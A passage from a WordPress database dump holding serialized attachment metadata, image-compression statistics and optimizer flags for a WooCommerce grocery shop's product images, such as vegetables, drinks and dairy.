image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.42359999999999998;}s:3:\"end\";i:1594122816;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:41753;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:13634;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.32650000000000001;}s:3:\"end\";i:1591599378;}}'),(94,182,'siteground_optimizer_optimization_attempts','1'),(95,182,'siteground_optimizer_is_optimized','1'),(96,182,'siteground_optimizer_webp_conversion_attempts','1'),(97,182,'siteground_optimizer_webp_conversion_failed','1'),(99,184,'_wp_attached_file','2020/06/organicc-capcicum.png'),(100,184,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2020/06/organicc-capcicum.png\";s:8:\"filesize\";i:44623;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:29:\"organicc-capcicum-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:60309;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:29:\"organicc-capcicum-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8375;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:27:\"organicc-capcicum-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2751;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(101,184,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:216005;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:44623;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.20660000000000001;}s:3:\"end\";i:1591599355;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:52930;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:15191;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.28699999999999998;}s:3:\"end\";i:1594122805;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:16221;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:5706;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.3518;}s:3:\"end\";i:1594122802;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:59819;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:15999;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.26750000000000002;}s:3:\"end\";i:1594122809;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:8197;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3437;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.41930000000000001;}s:3:\"end\";i:1594122812;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:32220;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:9270;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.28770000000000001;}s:3:\"end\";i:1591599364;}}'),(102,184,'siteground_optimizer_optimization_attempts','1'),(103,184,'siteground_optimizer_is_optimized','1'),(104,184,'siteground_optimizer_webp_conversion_attempts','1'),(105,184,'siteground_optimizer_webp_conversion_failed','1'),(107,186,'_wp_attached_file','2020/06/organicc-lettuce.png'),(108,186,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:28:\"2020/06/organicc-lettuce.png\";s:8:\"filesize\";i:64046;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:28:\"organicc-lettuce-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:61845;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:28:\"organicc-lettuce-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6999;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:26:\"organicc-lettuce-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2187;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(109,186,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:230627;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:64046;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.2777;}s:3:\"end\";i:1591599355;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:56746;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:19064;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.33600000000000002;}s:3:\"end\";i:1594122801;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:15166;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:6011;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.39629999999999999;}s:3:\"end\";i:1594122798;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:63227;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:21218;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.33560000000000001;}s:3:\"end\";i:1594122805;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:7132;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3383;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.4743;}s:3:\"end\";i:1594122808;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:30780;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:10656;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.34620000000000001;}s:3:\"end\";i:1591599364;}}'),(110,186,'siteground_optimizer_optimization_attempts','1'),(111,186,'siteground_optimizer_is_optimized','1'),(112,186,'siteground_optimizer_webp_conversion_attempts','1'),(113,186,'siteground_optimizer_webp_conversion_failed','1'),(115,187,'_wp_attached_file','2020/06/organicc-corn.png'),(116,187,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:25:\"2020/06/organicc-corn.png\";s:8:\"filesize\";i:52617;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:25:\"organicc-corn-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:56561;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:25:\"organicc-corn-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7323;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"organicc-corn-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2382;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(117,187,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:192244;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:52617;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.2737;}s:3:\"end\";i:1591599353;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:50898;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:17253;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.33900000000000002;}s:3:\"end\";i:1594122800;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:14975;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:5694;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.38019999999999998;}s:3:\"end\";i:1594122797;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:57214;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:18981;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.33179999999999998;}s:3:\"end\";i:1594122803;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:7338;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3248;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.44259999999999999;}s:3:\"end\";i:1594122806;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:29859;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:10005;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.33510000000000001;}s:3:\"end\";i:1591599362;}}'),(118,187,'siteground_optimizer_optimization_attempts','1'),(119,187,'siteground_optimizer_is_optimized','1'),(120,187,'siteground_optimizer_webp_conversion_attempts','1'),(121,187,'siteground_optimizer_webp_conversion_failed','1'),(123,189,'_wp_attached_file','2020/06/Minereal-water.png'),(124,189,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:26:\"2020/06/Minereal-water.png\";s:8:\"filesize\";i:25179;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:26:\"Minereal-water-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23816;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:26:\"Minereal-water-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3108;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:24:\"Minereal-water-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1035;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(125,189,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:86555;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:25179;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.29089999999999999;}s:3:\"end\";i:1591599352;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:21267;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:8031;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.37759999999999999;}s:3:\"end\";i:1594122798;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:6073;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3074;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.50619999999999998;}s:3:\"end\";i:1594122796;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:23702;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:8936;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.377;}s:3:\"end\";i:1594122801;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:3055;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:2014;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.65920000000000001;}s:3:\"end\";i:1594122803;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:12382;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:5036;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.40670000000000001;}s:3:\"end\";i:1591599360;}}'),(126,189,'siteground_optimizer_optimization_attempts','1'),(127,189,'siteground_optimizer_is_optimized','1'),(128,189,'siteground_optimizer_webp_conversion_attempts','1'),(129,189,'siteground_optimizer_webp_conversion_failed','1'),(131,191,'_wp_attached_file','2020/06/cold-drinks.png'),(132,191,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:23:\"2020/06/cold-drinks.png\";s:8:\"filesize\";i:20199;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:23:\"cold-drinks-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25523;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:23:\"cold-drinks-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3716;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:21:\"cold-drinks-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1307;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(133,191,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:87774;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:20199;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.2301;}s:3:\"end\";i:1591599351;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:21212;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:7367;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.3473;}s:3:\"end\";i:1594122798;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:6845;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3137;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.45829999999999999;}s:3:\"end\";i:1594122795;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:24412;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:8098;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.33169999999999999;}s:3:\"end\";i:1594122801;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:3559;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:2073;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.58250000000000002;}s:3:\"end\";i:1594122803;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:13826;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:4796;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.34689999999999999;}s:3:\"end\";i:1591599359;}}'),(134,191,'siteground_optimizer_optimization_attempts','1'),(135,191,'siteground_optimizer_is_optimized','1'),(136,191,'siteground_optimizer_webp_conversion_attempts','1'),(137,191,'siteground_optimizer_webp_conversion_failed','1'),(139,193,'_wp_attached_file','2020/06/fruit-juices.png'),(140,193,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:24:\"2020/06/fruit-juices.png\";s:8:\"filesize\";i:39353;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:24:\"fruit-juices-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47806;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:24:\"fruit-juices-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6835;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:22:\"fruit-juices-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2343;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(141,193,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:154436;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:39353;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.25480000000000003;}s:3:\"end\";i:1591599336;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:40898;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:13196;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.32269999999999999;}s:3:\"end\";i:1594122793;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:12999;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:4965;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.38200000000000001;}s:3:\"end\";i:1594122790;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:46187;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:14102;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.30530000000000002;}s:3:\"end\";i:1594122796;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:6609;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3101;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.46920000000000001;}s:3:\"end\";i:1594122799;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:25664;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:7840;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.30549999999999999;}s:3:\"end\";i:1591599344;}}'),(142,193,'siteground_optimizer_optimization_attempts','1'),(143,193,'siteground_optimizer_is_optimized','1'),(144,193,'siteground_optimizer_webp_conversion_attempts','1'),(145,193,'siteground_optimizer_webp_conversion_failed','1'),(147,195,'_wp_attached_file','2020/06/butter-cheese.png'),(148,195,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:25:\"2020/06/butter-cheese.png\";s:8:\"filesize\";i:33809;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:25:\"butter-cheese-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:35415;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:25:\"butter-cheese-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5061;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"butter-cheese-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1799;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(149,195,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:121126;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:33809;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.27910000000000001;}s:3:\"end\";i:1591599335;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:31921;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:11257;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.35270000000000001;}s:3:\"end\";i:1594122788;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:9598;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:4189;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.43640000000000001;}s:3:\"end\";i:1594122785;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:35873;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:12173;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.33929999999999999;}s:3:\"end\";i:1594122791;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:4916;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:2618;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.53249999999999997;}s:3:\"end\";i:1594122794;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:18876;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:6858;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.36330000000000001;}s:3:\"end\";i:1591599343;}}'),(150,195,'siteground_optimizer_optimization_attempts','1'),(151,195,'siteground_optimizer_is_optimized','1'),(152,195,'siteground_optimizer_webp_conversion_attempts','1'),(153,195,'siteground_optimizer_webp_conversion_failed','1'),(155,197,'_wp_attached_file','2020/06/cakes-patries.png'),(156,197,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:25:\"2020/06/cakes-patries.png\";s:8:\"filesize\";i:90850;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:25:\"cakes-patries-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:94447;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:25:\"cakes-patries-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i